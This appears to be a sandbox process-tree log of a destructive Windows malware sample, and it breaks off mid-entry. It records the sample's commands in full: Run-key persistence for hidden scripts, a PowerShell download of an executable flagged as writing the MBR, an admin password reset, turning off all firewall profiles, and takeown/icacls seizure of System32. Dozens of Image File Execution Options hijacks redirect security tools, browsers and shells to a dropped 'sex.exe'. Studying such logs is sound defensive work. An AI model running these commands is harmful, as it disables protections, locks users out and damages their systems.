-
C:\Windows\System32\control.exe"C:\Windows\System32\control.exe" "C:\Windows\system32\main.cpl",3⤵PID:3936
-
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Windows\system32\main.cpl",4⤵PID:4696
-
-
-
C:\Windows\system32\mmc.exe"C:\Windows\system32\mmc.exe" "C:\Windows\system32\azman.msc"3⤵
- Suspicious behavior: SetClipboardViewer
- Suspicious use of SetWindowsHookEx
PID:3996
-
-
C:\Windows\system32\calc.execalc3⤵PID:3668
-
C:\Windows\System32\win32calc.exe"C:\Windows\System32\win32calc.exe"4⤵PID:5108
-
-
-
C:\Windows\system32\calc.execalc3⤵PID:3904
-
C:\Windows\System32\win32calc.exe"C:\Windows\System32\win32calc.exe"4⤵PID:3544
-
-
-
C:\Windows\system32\ComputerDefaults.execomputerdefaults3⤵PID:4780
-
-
C:\Windows\system32\attrib.exeattrib +s +h c:\123.vbs3⤵
- Sets file to hidden
- Views/modifies file attributes
PID:4996
-
-
C:\Windows\system32\attrib.exeattrib +s +h c:\1234.vbs3⤵
- Sets file to hidden
- Views/modifies file attributes
PID:4504
-
-
C:\Windows\system32\attrib.exeattrib +s +h c:\gay.bat3⤵
- Sets file to hidden
- Views/modifies file attributes
PID:4476
-
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v 123.vbs /d c:\123.vbs3⤵
- Adds Run key to start application
PID:1384
-
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v mbr.exe /d "C:\Windows\N3OS3X3R\mbr.exe"3⤵
- Adds Run key to start application
PID:5748
-
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v 1234.vbs /d c:\1234.vbs3⤵
- Adds Run key to start application
PID:708
-
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v gay.bat /d c:\gay.bat3⤵
- Adds Run key to start application
PID:1316
-
-
C:\Windows\system32\attrib.exeattrib +s +h c:\123.vbs3⤵
- Sets file to hidden
- Views/modifies file attributes
PID:3796
-
-
C:\Windows\system32\attrib.exeattrib +s +h c:\1234.vbs3⤵
- Sets file to hidden
- Views/modifies file attributes
PID:456
-
-
C:\Windows\system32\attrib.exeattrib +s +h c:\gay.bat3⤵
- Sets file to hidden
- Views/modifies file attributes
PID:1644
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\123.vbs"3⤵
- Enumerates connected drives
PID:5468
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\1234.vbs"3⤵PID:3812
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\bozo8.vbs"3⤵PID:4384
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\bozo8.vbs"3⤵PID:3160
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\bozo8.vbs"3⤵PID:64
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\bozo8.vbs"3⤵PID:216
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\bozo8.vbs"3⤵PID:5748
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\bozo8.vbs"3⤵PID:5440
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\bozo8.vbs"3⤵PID:5272
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\bozo8.vbs"3⤵PID:1148
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\bozo8.vbs"3⤵PID:3104
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\bozo8.vbs"3⤵PID:1688
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\bozo8.vbs"3⤵PID:1284
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\bozo8.vbs"3⤵PID:5452
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\bozo8.vbs"3⤵PID:6028
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\bozo8.vbs"3⤵PID:2460
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Invoke-WebRequest -Uri 'https://pbs.twimg.com/media/FkSeD3kXkAEVNrI?format=jpg' -OutFile 'C:\Users\Admin\AppData\Local\Temp\wallpaper.jpg'"3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:4516
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-ItemProperty -Path 'HKCU:\Control Panel\Desktop\' -Name Wallpaper -Value 'C:\Users\Admin\AppData\Local\Temp\wallpaper.jpg'; Add-Type -TypeDefinition 'using System; using System.Runtime.InteropServices; public class Wallpaper { [DllImport(\"user32.dll\")] public static extern int SystemParametersInfo(int uAction, int uParam, string lpvParam, int fuWinIni); }'; [Wallpaper]::SystemParametersInfo(20, 0, 'C:\Users\Admin\AppData\Local\Temp\wallpaper.jpg', 3)"3⤵
- Command and Scripting Interpreter: PowerShell
- Sets desktop wallpaper using registry
- Suspicious behavior: EnumeratesProcesses
PID:6056 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\e5rn0hfi\e5rn0hfi.cmdline"4⤵PID:4308
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESD349.tmp" "c:\Users\Admin\AppData\Local\Temp\e5rn0hfi\CSC6D98818FF2604F7E936B1342368D452B.TMP"5⤵PID:1952
-
-
-
-
C:\Windows\system32\control.execontrol userpasswords23⤵PID:2420
-
C:\Windows\system32\netplwiz.exe"C:\Windows\system32\netplwiz.exe"4⤵PID:3528
-
-
-
C:\Windows\system32\control.execontrol userpasswords3⤵PID:4248
-
-
C:\Windows\system32\cscript.execscript email_spam.vbs3⤵PID:4972
-
-
C:\Windows\System32\control.exe"C:\Windows\System32\control.exe" "C:\Windows\system32\desk.cpl",3⤵PID:3012
-
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Windows\system32\desk.cpl",4⤵PID:3772
-
-
-
C:\Windows\system32\notepad.exenotepad3⤵PID:2268
-
-
C:\Windows\system32\mmc.exe"C:\Windows\system32\mmc.exe" "C:\Windows\system32\comexp.msc"3⤵
- Suspicious behavior: SetClipboardViewer
- Suspicious use of SetWindowsHookEx
PID:5804
-
-
C:\Windows\system32\credwiz.execredwiz.exe3⤵PID:4736
-
-
C:\Windows\system32\notepad.exenotepad3⤵PID:3100
-
-
C:\Windows\system32\DisplaySwitch.exedisplayswitch3⤵PID:5956
-
-
C:\Windows\system32\calc.execalc3⤵
- Modifies registry class
PID:2280 -
C:\Windows\System32\win32calc.exe"C:\Windows\System32\win32calc.exe"4⤵PID:5052
-
-
-
C:\Windows\System32\control.exe"C:\Windows\System32\control.exe" "C:\Windows\system32\main.cpl",3⤵PID:3420
-
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Windows\system32\main.cpl",4⤵PID:4680
-
-
-
C:\Windows\System32\control.exe"C:\Windows\System32\control.exe" "C:\Windows\system32\sysdm.cpl",3⤵PID:3904
-
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Windows\system32\sysdm.cpl",4⤵PID:4156
-
-
-
C:\Windows\system32\OptionalFeatures.exeoptionalfeatures3⤵PID:5084
-
-
C:\Windows\System32\control.exe"C:\Windows\System32\control.exe" "C:\Windows\system32\mmsys.cpl",3⤵PID:3392
-
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Windows\system32\mmsys.cpl",4⤵PID:660
-
-
-
C:\Windows\system32\control.execontrol3⤵PID:3828
-
-
C:\Windows\System32\control.exe"C:\Windows\System32\control.exe" "C:\Windows\system32\timedate.cpl",3⤵PID:4544
-
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Windows\system32\timedate.cpl",4⤵PID:2760
-
-
-
C:\Windows\System32\control.exe"C:\Windows\System32\control.exe" "C:\Windows\system32\desk.cpl",3⤵PID:4928
-
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Windows\system32\desk.cpl",4⤵PID:4504
-
-
-
C:\Windows\System32\control.exe"C:\Windows\System32\control.exe" "C:\Windows\system32\joy.cpl",3⤵PID:3420
-
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Windows\system32\joy.cpl",4⤵PID:6184
-
-
-
C:\Windows\system32\control.execontrol system3⤵PID:6828
-
-
C:\Windows\system32\mmc.exe"C:\Windows\system32\mmc.exe" "C:\Windows\system32\azman.msc"3⤵
- Suspicious behavior: SetClipboardViewer
- Suspicious use of SetWindowsHookEx
PID:4012
-
-
C:\Windows\system32\mmc.exe"C:\Windows\system32\mmc.exe" "C:\Windows\system32\WF.msc"3⤵
- Suspicious behavior: SetClipboardViewer
- Suspicious use of SetWindowsHookEx
PID:7128
-
-
C:\Windows\System32\control.exe"C:\Windows\System32\control.exe" "C:\Windows\system32\ncpa.cpl",3⤵PID:7112
-
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Windows\system32\ncpa.cpl",4⤵PID:5212
-
-
-
C:\Windows\system32\dccw.exedccw.exe3⤵PID:3796
-
-
C:\Windows\system32\dfrgui.exedfrgui.exe3⤵PID:4616
-
-
C:\Windows\system32\iscsicpl.exeiscsicpl3⤵PID:3724
-
-
C:\Windows\system32\colorcpl.execolorcpl.exe3⤵PID:6728
-
-
C:\Windows\system32\dialer.exedialer.exe3⤵PID:2608
-
-
C:\Windows\system32\eventvwr.exeeventvwr.exe3⤵PID:2404
-
C:\Windows\system32\mmc.exe"C:\Windows\system32\mmc.exe" "C:\Windows\system32\eventvwr.msc"4⤵
- Suspicious behavior: SetClipboardViewer
- Suspicious use of SetWindowsHookEx
PID:5160
-
-
-
C:\Windows\system32\notepad.exenotepad3⤵PID:6204
-
-
C:\Windows\system32\DisplaySwitch.exedisplayswitch3⤵PID:6124
-
-
C:\Windows\system32\calc.execalc3⤵PID:6892
-
C:\Windows\System32\win32calc.exe"C:\Windows\System32\win32calc.exe"4⤵PID:2168
-
-
-
C:\Windows\System32\control.exe"C:\Windows\System32\control.exe" "C:\Windows\system32\main.cpl",3⤵PID:100
-
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Windows\system32\main.cpl",4⤵PID:4256
-
-
-
C:\Windows\System32\control.exe"C:\Windows\System32\control.exe" "C:\Windows\system32\sysdm.cpl",3⤵PID:7052
-
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Windows\system32\sysdm.cpl",4⤵PID:6300
-
-
-
C:\Windows\system32\OptionalFeatures.exeoptionalfeatures3⤵PID:2760
-
-
C:\Windows\System32\control.exe"C:\Windows\System32\control.exe" "C:\Windows\system32\mmsys.cpl",3⤵PID:1368
-
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Windows\system32\mmsys.cpl",4⤵PID:4328
-
-
-
C:\Windows\system32\control.execontrol3⤵PID:6140
-
-
C:\Windows\System32\control.exe"C:\Windows\System32\control.exe" "C:\Windows\system32\timedate.cpl",3⤵PID:412
-
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Windows\system32\timedate.cpl",4⤵PID:2828
-
-
-
C:\Windows\System32\control.exe"C:\Windows\System32\control.exe" "C:\Windows\system32\desk.cpl",3⤵PID:2944
-
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Windows\system32\desk.cpl",4⤵PID:2412
-
-
-
C:\Windows\System32\control.exe"C:\Windows\System32\control.exe" "C:\Windows\system32\joy.cpl",3⤵PID:1104
-
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Windows\system32\joy.cpl",4⤵PID:6564
-
-
-
C:\Windows\system32\control.execontrol system3⤵PID:472
-
-
C:\Windows\system32\mmc.exe"C:\Windows\system32\mmc.exe" "C:\Windows\system32\azman.msc"3⤵
- Suspicious behavior: SetClipboardViewer
- Suspicious use of SetWindowsHookEx
PID:5740
-
-
C:\Windows\system32\mmc.exe"C:\Windows\system32\mmc.exe" "C:\Windows\system32\WF.msc"3⤵
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious behavior: SetClipboardViewer
- Suspicious use of SetWindowsHookEx
PID:7080
-
-
C:\Windows\System32\control.exe"C:\Windows\System32\control.exe" "C:\Windows\system32\ncpa.cpl",3⤵PID:2008
-
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Windows\system32\ncpa.cpl",4⤵PID:6848
-
-
-
C:\Windows\system32\net.exenet user "Admin" "YOU HAVE BEEN FUCKED"3⤵PID:4916
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user "Admin" "YOU HAVE BEEN FUCKED"4⤵PID:7132
-
-
-
C:\Windows\system32\net.exenet user Admin ih82011jaxs3⤵PID:972
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user Admin ih82011jaxs4⤵PID:1736
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Invoke-WebRequest -Uri 'https://sfdl.360safe.com/instbeta.exe' -OutFile 'C:\Windows\N3OS3X3R\chinah.exe'"3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- Suspicious behavior: EnumeratesProcesses
PID:7000
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K fucking.bat3⤵PID:2320
-
C:\Windows\N3OS3X3R\chinah.exeC:\Windows\N3OS3X3R\chinah.exe /VERYSILENT /NORESTART4⤵
- Checks computer location settings
- Executes dropped EXE
- Loads dropped DLL
- Writes to the Master Boot Record (MBR)
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:3440 -
C:\Users\Admin\AppData\Local\Temp\{A4C9B702-E213-4cf5-A5E0-D5A56678B126}.tmp\AgreementViewer.exe"C:\Users\Admin\AppData\Local\Temp\{A4C9B702-E213-4cf5-A5E0-D5A56678B126}.tmp\AgreementViewer.exe" /Content="C:\Users\Admin\AppData\Local\Temp\{A4C9B702-E213-4cf5-A5E0-D5A56678B126}.tmp\letter.rtf" /Title="致360安全卫士用户的一封信" /ShowERC5⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:5848
-
-
C:\Windows\SysWOW64\explorer.exe"C:\Windows\System32\explorer.exe" "http://sfdw.360safe.com/setup.exe"5⤵
- System Location Discovery: System Language Discovery
PID:5540
-
-
-
-
C:\Windows\system32\mmc.exe"C:\Windows\system32\mmc.exe" "C:\Windows\system32\fsmgmt.msc"3⤵
- Suspicious behavior: SetClipboardViewer
- Suspicious use of SetWindowsHookEx
PID:4308
-
-
C:\Windows\system32\nslookup.exenslookup myip.opendns.com resolver1.opendns.com3⤵
- Unexpected DNS network traffic destination
PID:6180
-
-
C:\Windows\system32\netsh.exenetsh wlan show profiles3⤵
- Event Triggered Execution: Netsh Helper DLL
- System Network Configuration Discovery: Wi-Fi Discovery
PID:2032
-
-
C:\Windows\system32\ipconfig.exeipconfig3⤵
- Gathers network information
PID:2992
-
-
C:\Windows\system32\ipconfig.exeipconfig3⤵
- Gathers network information
PID:4972
-
-
C:\Windows\system32\find.exefind /i "IPv4"3⤵PID:5792
-
-
C:\Windows\System32\Wbem\WMIC.exewmic diskdrive get size3⤵
- Suspicious behavior: EnumeratesProcesses
PID:5448
-
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get name3⤵
- Suspicious behavior: EnumeratesProcesses
PID:4012
-
-
C:\Windows\system32\systeminfo.exesysteminfo3⤵
- Gathers system information
PID:2404
-
-
C:\Windows\System32\control.exe"C:\Windows\System32\control.exe" "C:\Windows\system32\joy.cpl",3⤵PID:1692
-
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Windows\system32\joy.cpl",4⤵PID:6888
-
-
-
C:\Windows\system32\SlideToShutDown.exeslidetoshutdown.exe3⤵PID:648
-
-
C:\Windows\system32\iexpress.exeiexpress.exe3⤵PID:3204
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode disable3⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:5576
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode mode=DISABLE3⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:5048
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set currentprofile state off3⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:5088
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set domainprofile state off3⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:3880
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set privateprofile state off3⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:6048
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set publicprofile state off3⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:3864
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set allprofiles state off3⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:2940
-
-
C:\Windows\system32\timeout.exetimeout 2 /NOBREAK3⤵
- Delays execution with timeout.exe
PID:4884
-
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:5072
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32 /Grant Users:F3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:3648
-
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:4288
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\ /Grant Users:F3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:4496
-
-
C:\Windows\system32\charmap.execharmap.exe3⤵PID:4948
-
-
C:\Windows\system32\cleanmgr.execleanmgr.exe3⤵
- Enumerates connected drives
PID:5056
-
-
C:\Windows\system32\certreq.execertreq.exe3⤵
- Enumerates connected drives
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:4304 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:972
-
-
-
C:\Windows\system32\mmc.exe"C:\Windows\system32\mmc.exe" "C:\Windows\system32\certmgr.msc"3⤵
- Suspicious behavior: SetClipboardViewer
- Suspicious use of SetWindowsHookEx
PID:5836
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\speech.vbs"3⤵PID:5444
-
-
C:\Windows\system32\takeown.exetakeown /F "C:\Windows\Web" /A /R /D Y3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:6872
-
-
C:\Windows\system32\icacls.exeicacls "C:\Windows\Web" /setowner "Administrators" /T /C3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:6316
-
-
C:\Windows\system32\reg.exereg add "HKCR\inffile\shell\Install\command" /ve /d "C:\Windows\System32\sex.exe" /f3⤵PID:2764
-
-
C:\Windows\system32\reg.exereg add "HKCR\regfile\shell\open\command" /ve /d "C:\Windows\System32\sex.exe" /f3⤵PID:6404
-
-
C:\Windows\system32\reg.exereg add "HKCR\VBSFile\Shell\Edit\Command" /ve /d "C:\Windows\System32\sex.exe" /f3⤵PID:2352
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msert.exe\Debugger" /ve /d "C:\Windows\System32\sex.exe" /f3⤵PID:6048
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mssecse.exe\Debugger" /ve /d "C:\Windows\System32\sex.exe" /f3⤵
- Event Triggered Execution: Image File Execution Options Injection
PID:2384
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MSASCui.exe\Debugger" /ve /d "C:\Windows\System32\sex.exe" /f3⤵
- Event Triggered Execution: Image File Execution Options Injection
PID:5016
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icacls.exe\Debugger" /ve /d "C:\Windows\System32\sex.exe" /f3⤵
- Event Triggered Execution: Image File Execution Options Injection
PID:5060
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\CCleaner.exe\Debugger" /ve /d "C:\Windows\System32\sex.exe" /f3⤵
- Event Triggered Execution: Image File Execution Options Injection
PID:2072
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\CCleaner32.exe\Debugger" /ve /d "C:\Windows\System32\sex.exe" /f3⤵
- Event Triggered Execution: Image File Execution Options Injection
PID:1944
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\CCleaner64.exe\Debugger" /ve /d "C:\Windows\System32\sex.exe" /f3⤵
- Event Triggered Execution: Image File Execution Options Injection
PID:1444
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\vbsedit.exe\Debugger" /ve /d "C:\Windows\System32\sex.exe" /f3⤵
- Event Triggered Execution: Image File Execution Options Injection
PID:1276
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\htaedit.exe\Debugger" /ve /d "C:\Windows\System32\sex.exe" /f3⤵
- Event Triggered Execution: Image File Execution Options Injection
PID:5848
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\VirtualBox.exe\Debugger" /ve /d "C:\Windows\System32\sex.exe" /f3⤵
- Event Triggered Execution: Image File Execution Options Injection
PID:1632
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mbam.exe\Debugger" /ve /d "C:\Windows\System32\sex.exe" /f3⤵
- Event Triggered Execution: Image File Execution Options Injection
PID:2032
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\uTorrent.exe\Debugger" /ve /d "C:\Windows\System32\sex.exe" /f3⤵
- Event Triggered Execution: Image File Execution Options Injection
PID:2992
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\uninstall.exe\Debugger" /ve /d "C:\Windows\System32\sex.exe" /f3⤵
- Event Triggered Execution: Image File Execution Options Injection
PID:5096
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad++.exe\Debugger" /ve /d "C:\Windows\System32\sex.exe" /f3⤵
- Event Triggered Execution: Image File Execution Options Injection
PID:2412
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\adwcleaner_5.005.exe\Debugger" /ve /d "C:\Windows\System32\sex.exe" /f3⤵PID:5792
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\student.exe\Debugger" /ve /d "C:\Windows\System32\sex.exe" /f3⤵
- Event Triggered Execution: Image File Execution Options Injection
PID:5320
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mmc.exe\Debugger" /ve /d "C:\Windows\System32\sex.exe" /f3⤵
- Event Triggered Execution: Image File Execution Options Injection
PID:5284
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cmd.exe\Debugger" /ve /d "C:\Windows\System32\sex.exe" /f3⤵
- Event Triggered Execution: Image File Execution Options Injection
PID:5220
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\takeown.exe\Debugger" /ve /d "C:\Windows\System32\sex.exe" /f3⤵
- Event Triggered Execution: Image File Execution Options Injection
PID:2828
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msconfig.exe\Debugger" /ve /d "C:\Windows\System32\sex.exe" /f3⤵
- Event Triggered Execution: Image File Execution Options Injection
PID:768
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedit.exe\Debugger" /ve /d "C:\Windows\System32\sex.exe" /f3⤵
- Event Triggered Execution: Image File Execution Options Injection
PID:3900
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedit32.exe\Debugger" /ve /d "C:\Windows\System32\sex.exe" /f3⤵
- Event Triggered Execution: Image File Execution Options Injection
PID:7048
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedit33.exe\Debugger" /ve /d "C:\Windows\System32\sex.exe" /f3⤵PID:6328
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskmgr.exe\Debugger" /ve /d "C:\Windows\System32\sex.exe" /f3⤵
- Event Triggered Execution: Image File Execution Options Injection
PID:6316
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\attrib.exe\Debugger" /ve /d "C:\Windows\System32\sex.exe" /f3⤵
- Event Triggered Execution: Image File Execution Options Injection
PID:5540
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\install.exe\Debugger" /ve /d "C:\Windows\System32\sex.exe" /f3⤵
- Event Triggered Execution: Image File Execution Options Injection
PID:3840
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\setup.exe\Debugger" /ve /d "C:\Windows\System32\sex.exe" /f3⤵
- Event Triggered Execution: Image File Execution Options Injection
PID:2352
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe\Debugger" /ve /d "C:\Windows\System32\sex.exe" /f3⤵
- Event Triggered Execution: Image File Execution Options Injection
PID:6048
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\explorer.exe\Debugger" /ve /d "C:\Windows\System32\sex.exe" /f3⤵
- Event Triggered Execution: Image File Execution Options Injection
PID:2384
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\iexplore.exe\Debugger" /ve /d "C:\Windows\System32\sex.exe" /f3⤵PID:5016
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\chrome.exe\Debugger" /ve /d "C:\Windows\System32\sex.exe" /f3⤵
- Event Triggered Execution: Image File Execution Options Injection
PID:4276
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\firefox.exe\Debugger" /ve /d "C:\Windows\System32\sex.exe" /f3⤵
- Event Triggered Execution: Image File Execution Options Injection
